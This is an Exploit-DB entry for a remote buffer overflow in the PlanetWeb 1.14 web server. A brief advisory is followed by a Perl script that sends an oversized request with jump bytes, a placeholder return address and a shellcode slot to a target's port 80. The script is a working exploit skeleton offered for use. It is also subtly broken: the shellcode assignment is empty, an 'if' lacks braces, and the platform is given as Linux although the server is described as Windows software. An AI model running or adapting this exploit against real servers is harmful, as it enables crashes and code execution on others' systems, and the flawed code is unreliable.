PlanetDNS PlanetWeb 1.14 Malformed Request Remote Buffer Overflow Vulnerability

ID EDB-ID:21945
Type exploitdb
Reporter securma massine
Modified 2002-10-17T00:00:00


PlanetDNS PlanetWeb 1.14 Malformed Request Remote Buffer Overflow Vulnerability. Remote exploit for linux platform


PlanetWeb is a commercially available web server integrated with dynamic DNS services. It is distributed by PlanetDNS, and available for Microsoft Operating Systems.

PlanetWeb does not properly handle long requests. Due to insufficient bounds checking, a long request sent to PlanetWeb may result in a buffer overflow. This could result in a denial of service, and has been reported as being exploitable to execute arbitrary code. 

#!/usr/bin/perl -w
# buffer overflow tested against plaetweb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and (specialemet tu p�dales moins fort, moins tu #avances plus vite..)

use IO::Socket;
if ($#ARGV<0)
 print "\n write the target IP!! \n\n";

$shellcode =
$buffer = "A"x6444;
$ebx = "\x90\xEB\x08\x90";# you have the chance because ebx = eip - 4 bytes jmp short 0xff x0d3
$ret = "\x43\x43\x43\x43";# insert your ret address with (jmp ebx or call ebx)
$minibuf ="\x90\x90\x90\x90";# will be jumped by EB08
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"80"); unless ($connect) { die "cant connect $ARGV [0]" }
print $connect "$buffer$ebx$ret$minibuf$shellcode";
print "\nsending exploit......\n\n";